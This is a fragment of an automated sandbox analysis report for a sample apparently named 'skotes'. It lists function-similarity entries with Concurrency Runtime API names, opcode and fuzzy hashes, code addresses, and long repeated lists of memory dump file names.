                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3844194624-0
                                                                                                                • Opcode ID: bf9f84604aa2d9fac5752413f1bb7ae713e2b544be21ff00c5d2b8ad062caed2
                                                                                                                • Instruction ID: f292e28a87ef94c17220f45e6acbb071067d54187dec0be19f65d3b0d916cd3b
                                                                                                                • Opcode Fuzzy Hash: bf9f84604aa2d9fac5752413f1bb7ae713e2b544be21ff00c5d2b8ad062caed2
                                                                                                                • Instruction Fuzzy Hash: D001D672600521EFCF25BB64E88AE6EB77ABFC67107000229F40457612DB6EEC2187A0
                                                                                                                APIs
                                                                                                                • ListArray.LIBCONCRT ref: 007AEE6A
                                                                                                                • ListArray.LIBCONCRT ref: 007AEE7C
                                                                                                                  • Part of subcall function 007AEF29: _InternalDeleteHelper.LIBCONCRT ref: 007AEF3B
                                                                                                                • ListArray.LIBCONCRT ref: 007AEE86
                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 007AEE9F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3844194624-0
                                                                                                                • Opcode ID: 78669545d6d8a1d65996b460383f90b9d1a6d4a096d4dd28b271d73ff66dd404
                                                                                                                • Instruction ID: 68a7dd16721090eda5d03032ec3dda28b7ea728f342b8cb016902567af2360a9
                                                                                                                • Opcode Fuzzy Hash: 78669545d6d8a1d65996b460383f90b9d1a6d4a096d4dd28b271d73ff66dd404
                                                                                                                • Instruction Fuzzy Hash: 0A01D672300521FFDE25BB61D8CAD6EBB79FFC67107000229F40457611CB28EC2186D0
                                                                                                                APIs
                                                                                                                • ListArray.LIBCONCRT ref: 007AD0C5
                                                                                                                • ListArray.LIBCONCRT ref: 007AD0D7
                                                                                                                  • Part of subcall function 007AC6B2: _InternalDeleteHelper.LIBCONCRT ref: 007AC6C4
                                                                                                                • ListArray.LIBCONCRT ref: 007AD0E1
                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 007AD0FA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3844194624-0
                                                                                                                • Opcode ID: b04c49df2b26f16a9047fba8fd5daab8e9133e70554a6a0a3bf8f59b6d3533b6
                                                                                                                • Instruction ID: ed6f51ad0a812b1c8be9c492a73bbd1942741463286df9e0d9d27a851d3d0284
                                                                                                                • Opcode Fuzzy Hash: b04c49df2b26f16a9047fba8fd5daab8e9133e70554a6a0a3bf8f59b6d3533b6
                                                                                                                • Instruction Fuzzy Hash: 6501D672200521FFCE36BB60D9CAD6EB779BFCA710B01022AF40597A11DF28AC518690
                                                                                                                APIs
                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007B33DB
                                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 007B33EF
                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 007B3407
                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B341F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                • String ID:
                                                                                                                • API String ID: 78362717-0
                                                                                                                • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                • Instruction ID: 91fc2c78b9c6b62c0bc3a12f8d9da9d95713c0d5042b39d0f0702e7b0e391bab
                                                                                                                • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                • Instruction Fuzzy Hash: 5601D632600514E7CF16EE548845BFF77A99F85750F100115FC16AB282DA79EE4097A0
                                                                                                                APIs
                                                                                                                • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 007A9519
                                                                                                                  • Part of subcall function 0079F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 007A5486
                                                                                                                • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 007A953D
                                                                                                                • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 007A9550
                                                                                                                • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 007A9559
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                • String ID:
                                                                                                                • API String ID: 218105897-0
                                                                                                                • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                • Instruction ID: 72fa470b4b339bd6b422e76feea455837b562c6685b98e76c20cd77aa7fbaa56
                                                                                                                • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                • Instruction Fuzzy Hash: EAF0A730A00A109EEA62AB588816FAB23959FC6711F00C61DE51BD71C2CE2CE852CB81
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __fassign
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 3965848254-768041998
